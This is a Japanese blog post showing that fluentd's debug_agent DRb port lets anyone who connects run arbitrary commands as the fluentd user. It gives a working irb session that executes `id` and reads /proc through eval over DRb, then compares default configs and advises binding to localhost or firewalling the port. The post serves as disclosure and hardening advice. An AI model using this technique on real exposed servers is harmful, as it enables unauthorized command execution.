@znz blog

ZnZ の memo のようなもの

fluentd に drb で接続してみた

| Comments

druby の口が公開されていたら、そのユーザーの権限で何でも実行できるはず、 ということで、ちょっと試してみました。

対象バージョン

  • ruby 2.1.2
  • fluentd 0.10.49

環境の準備

vagrant 上で rbenv と ruby-build を使ってインストールした ruby 2.1.2 で

  • gem install fluentd
  • fluentd --setup /vagrant/fluent
  • fluentd -c /vagrant/fluent/fluent.conf &

と起動して準備しておきました。

実行例

irb を起動しているユーザーと同じユーザーで fluentd も起動しているので、 特に面白いことはできそうになかったのですが、 /proc/$$/cmdline を確認すると irb 側ではなく、 ちゃんと fluentd 側で任意のコマンドが実行できていることがわかります。

vagrant@fluentd-vm:~$ rbenv exec irb -r irb/completion --simple-prompt
>> require 'drb'
=> true
>> d = DRbObject.new_with_uri('druby://127.0.0.1:24230'); nil
=> nil
>> d.method_missing(:send, :eval, "`id`")
=> "uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)\n"
>> d.method_missing(:send, :eval, '`cat /proc/$PPID/cmdline`')
=> "/opt/rbenv/versions/2.1.2/bin/ruby\x00/opt/rbenv/versions/2.1.2/bin/fluentd\x00-c\x00/vagrant/fluent/fluent.conf\x00"

雑感

root 権限で起動しているなら debug_agent は有効にしない方が良さそうだし、 ローカルユーザーが fluentd の実行ユーザーの権限を使えるとまずい場合も有効にしない方が良さそうだと思いました。

また、知っている人には当たり前のことですが、 drb は外部に安全に公開できるものではないので、 使う場合も localhost だけ待ち受けるように制限すべきです。

td-agent は初期設定でそうなっているのですが、 fluentd --setup はそうなっていないので、 適切に設定を変更するなり firewall で塞ぐなりしておく必要がありそうです。

td-agent 1.1.19-1 での初期設定

127.0.0.1 だけで待ち受けるようになっていました。

## live debugging agent
<source>
  type debug_agent
  bind 127.0.0.1
  port 24230
</source>

fluentd --setup で生成される設定

外からも受けつけるようになっていました。

# Listen DRb for debug
<source>
  type debug_agent
  port 24230
</source>

参考

Comments